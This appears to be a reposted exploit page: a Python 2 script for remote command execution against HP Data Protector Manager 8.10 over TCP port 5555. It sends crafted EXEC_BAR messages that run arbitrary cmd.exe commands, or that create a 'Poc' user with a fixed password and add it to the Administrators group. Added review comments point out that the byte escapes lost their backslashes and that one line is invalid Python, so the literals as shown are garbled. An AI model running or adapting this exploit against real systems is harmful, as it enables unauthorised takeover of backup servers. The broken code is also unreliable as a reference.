
HP Data Protection Manager 8.10 Remote Command Execution

Posted on 16 July 2014

#!/usr/bin/python
# Exploit Title: HP-Data-Protector-8.10 Remote command execution.
# Date: July 11 2014
# Exploit Author: Christian (Polunchis) Ramirez https://intrusionlabs.org
# Exploit Author: Henoch (Chanoc) Barrera https://intrusionlabs.org
# Contacts: polunchis@intrusionlabs.org and chanoc@intrusionlabs.org
# Version: HP Data Protector manager 8.10 the last version
# Vendor web page: http://www8.hp.com/mx/es/software-solutions/software.html?compURI=1175640#.U8DhWaU_BjF
# Tested on: Windows 2003, Windows 2008 and Windows 2012 all languages
# Thanks:To GOD for giving us wisdom
# Description:
# A remote command execution is triggered when craft command is sent to the Hp Data Protector Manager to tcp port 5555.
#
# NOTE(review): this is Python 2 code (print statements, raw_input). As captured
# on this page the "\x.." byte escapes have lost their backslashes (e.g. "x00x00"),
# and `command.replace("\", "\\")` is not valid Python as written, so the
# literals below are not the byte sequences the author shipped.
#
# NOTE(review, defender view): the exchange is plain TCP to port 5555. Both
# prebuilt messages start with a 4-byte big-endian length of the remainder
# (0x013c = 316 bytes for shellusr, 0x0156 = 342 bytes for shellgrp, which
# matches the byte counts below), and the response parser reads the same
# 4-byte big-endian length (struct.unpack(">I")). The message bodies are
# UTF-16LE text (each ASCII byte is followed by x00) and carry the token
# "EXEC_BAR" (x45 x58 x45 x43 x5f x42 x41 x52) followed by a
# "c:\windows\system32\cmd.exe /c ..." command line — both are usable as
# network-signature material for this traffic.
import socket
import struct
import sys

# net user Poc l@bs.og /add
# Body (after the 4-byte length) decodes from UTF-16LE to an EXEC_BAR request
# that runs cmd.exe /c net user Poc l@bs.og /add.
shellusr = ("x00x00x01x3cxffxfex32x00x00x00x20x00x68x00x70x00"
            "x64x00x70x00x31x00x00x00x20x00x30x00x00x00x20x00"
            "x00x00x20x00x00x00x20x00x45x00x4ex00x55x00x00x00"
            "x20x00x31x00x31x00x00x00x20x00x45x00x58x00x45x00"
            "x43x00x5fx00x42x00x41x00x52x00x00x00x20x00x41x00"
            "x41x00x41x00x41x00x00x00x20x00x41x00x41x00x41x00"
            "x41x00x00x00x20x00x41x00x41x00x41x00x41x00x00x00"
            "x20x00x41x00x41x00x41x00x41x00x00x00x20x00x41x00"
            "x41x00x41x00x41x00x00x00x20x00x41x00x41x00x41x00"
            "x41x00x00x00x20x00x41x00x41x00x41x00x41x00x00x00"
            "x20x00x41x00x41x00x41x00x41x00x00x00x20x00x41x00"
            "x41x00x41x00x41x00x00x00x20x00x41x00x41x00x41x00"
            "x41x00x00x00x20x00x63x00x3ax00x5cx00x77x00x69x00"
            "x6ex00x64x00x6fx00x77x00x73x00x5cx00x73x00x79x00"
            "x73x00x74x00x65x00x6dx00x33x00x32x00x5cx00x63x00"
            "x6dx00x64x00x2ex00x65x00x78x00x65x00x00x00x20x00"
            "x00x00x20x00x2fx00x63x00x20x00x6ex00x65x00x74x00"
            "x20x00x75x00x73x00x65x00x72x00x20x00x50x00x6fx00"
            "x63x00x20x00x6cx00x40x00x62x00x73x00x2ex00x6fx00"
            "x67x00x20x00x2fx00x61x00x64x00x64x00x00x00x00x00")

# net user local group Administrators Poc /add
# Same framing and EXEC_BAR layout as shellusr; the command line decodes to
# cmd.exe /c net localgroup Administrators Poc /add.
shellgrp = ("x00x00x01x56xffxfex32x00x00x00x20x00x68x00x70x00"
            "x64x00x70x00x31x00x00x00x20x00x30x00x00x00x20x00"
            "x00x00x20x00x00x00x20x00x45x00x4ex00x55x00x00x00"
            "x20x00x31x00x31x00x00x00x20x00x45x00x58x00x45x00"
            "x43x00x5fx00x42x00x41x00x52x00x00x00x20x00x41x00"
            "x41x00x41x00x41x00x00x00x20x00x41x00x41x00x41x00"
            "x41x00x00x00x20x00x41x00x41x00x41x00x41x00x00x00"
            "x20x00x41x00x41x00x41x00x41x00x00x00x20x00x41x00"
            "x41x00x41x00x41x00x00x00x20x00x41x00x41x00x41x00"
            "x41x00x00x00x20x00x41x00x41x00x41x00x41x00x00x00"
            "x20x00x41x00x41x00x41x00x41x00x00x00x20x00x41x00"
            "x41x00x41x00x41x00x00x00x20x00x41x00x41x00x41x00"
            "x41x00x00x00x20x00x63x00x3ax00x5cx00x77x00x69x00"
            "x6ex00x64x00x6fx00x77x00x73x00x5cx00x73x00x79x00"
            "x73x00x74x00x65x00x6dx00x33x00x32x00x5cx00x63x00"
            "x6dx00x64x00x2ex00x65x00x78x00x65x00x00x00x20x00"
            "x00x00x20x00x2fx00x63x00x20x00x6ex00x65x00x74x00"
            "x20x00x6cx00x6fx00x63x00x61x00x6cx00x67x00x72x00"
            "x6fx00x75x00x70x00x20x00x41x00x64x00x6dx00x69x00"
            "x6ex00x69x00x73x00x74x00x72x00x61x00x74x00x6fx00"
            "x72x00x73x00x20x00x50x00x6fx00x63x00x20x00x2fx00"
            "x61x00x64x00x64x00x00x00x00x00")


def connect_target(target, port):
    """Open a TCP connection to (target, port).

    Returns the connected socket, or -1 when the socket cannot be created or
    the connect fails; both failure paths print a message instead of raising.
    Only socket.error is caught, so any other exception from connect()
    (e.g. a non-integer port) propagates to the caller.  Python 2 idiom:
    the error is indexed as err[0] (errno) and err[1] (message).
    """
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    except socket.error as err:
        print "[-]Close Socket! CODE: %d MSG: %s" % (err[0], err[1])
        return -1
    try:
        sock.connect((target, port))
    except socket.error as err:
        print "[-] It cannot connect to the target! CODE: %d MSG: %s" % (err[0], err[1])
        return -1
    return sock


def send_recv_packet(sock, packet):
    """Send `packet` on `sock` and return one recv() of up to 4096 bytes.

    A single recv() may return fewer bytes than the peer sent, so the caller
    sees only the first chunk of a longer response.
    """
    sock.sendall(packet)
    res = sock.recv(4096)
    return res


# --- interactive entry point (Python 2) ---
print """ [*] https://intrusionlabs.org """
print "[*] Choose a valid option"
print """ [1] Run remote commands [2] Add Poc user to Administrators group with password l@bs.og """
opcion= raw_input("Choose an option i.e. 1 or 2: ")
if opcion.isdigit():
    opcion = int(opcion)
if opcion == 1:
    ip_remota= raw_input("IP Address: ")
    port= raw_input("Port: ")
    command= raw_input("command: ")
    if port.isdigit():
        port = int(port)
    else:
        # NOTE(review): no exit here, so `port` stays a str and the connect
        # below fails with an exception connect_target does not catch.
        print "Please provide a tcp port"
    objetivo = connect_target(ip_remota, port)
    if objetivo == -1:
        exit()
    # OFFSET + len(command) is packed into a single byte via chr(), which
    # presumably acts as the length field of the hand-built message below.
    OFFSET = 46
    command = command.replace("\", "\\")
    command_tmno = chr(OFFSET + len(command))
    shell = "x00x00x00" + command_tmno + "x32x00x01" + "x01x01x01" + "x01x01x00" + "x01x00x01" + "x00x01x00" + "x01x01x00" + "x2028x00" + "\x70x65x72" + "x6cx2ex65x78" + "x65x00 x2dx65" + "x73x79x73x74x65x6d" + "('%s')x00" % command
    print >> sys.stderr, "[+] Sending the payload with the command: '%s'" % command
    # `datos` (the first reply chunk) is read but never used.
    datos = send_recv_packet(objetivo, shell)
    # Parse the response back: each record is a 4-byte big-endian length
    # followed by that many bytes; the first 5 body bytes are dropped.  The
    # loop ends on a "*RETVAL*" marker or when the peer closes (empty recv).
    print >> sys.stderr, "[+] Output:"
    while True:
        # Get information about response
        tmno_respuesta = objetivo.recv(4)
        if not tmno_respuesta:
            break
        n = struct.unpack(">I", tmno_respuesta)[0]
        # NOTE(review): a single recv(n) may return fewer than n bytes.
        respuesta = objetivo.recv(n)
        respuesta = respuesta[5:].strip()
        respuesta = respuesta.replace(" ", "")
        respuesta = respuesta.replace("x00", "")
        if respuesta.upper().find("*RETVAL*") != -1:
            break
        print respuesta
    objetivo.close()
    print >> sys.stderr, "print [!] Port close... "
elif opcion == 2:
    ip_remota= raw_input("IP Address: ")
    port= raw_input(" Port: ")
    if port.isdigit():
        port = int(port)
    else:
        # NOTE(review): same fall-through as option 1 — `port` remains a str.
        print "Please provide a tcp port"
    print " [*]Creating P0c user and try to add it to Administrators group"
    #Get information about response
    print " [*]Attempting to create Poc user and try to add it to Administrators group with password l@bs.og"
    # One fresh connection per prebuilt message.
    for packet in [shellusr, shellgrp]:
        target = connect_target(ip_remota, port)
        if target == -1:
            exit()
        data = send_recv_packet(target, packet)
        # NOTE(review): split(...)[1] raises IndexError when the marker is
        # absent from the reply (e.g. a short or unexpected response).
        print "[*]SERVER RESPONSE: " + data.split("xFFxFEx31x00x35x00x00x00x20x00")[1].lstrip("x07x00x01x00").rstrip("$")
        target.close()
else:
    print "Please provide a valid option i.e. 1 or 2"

 
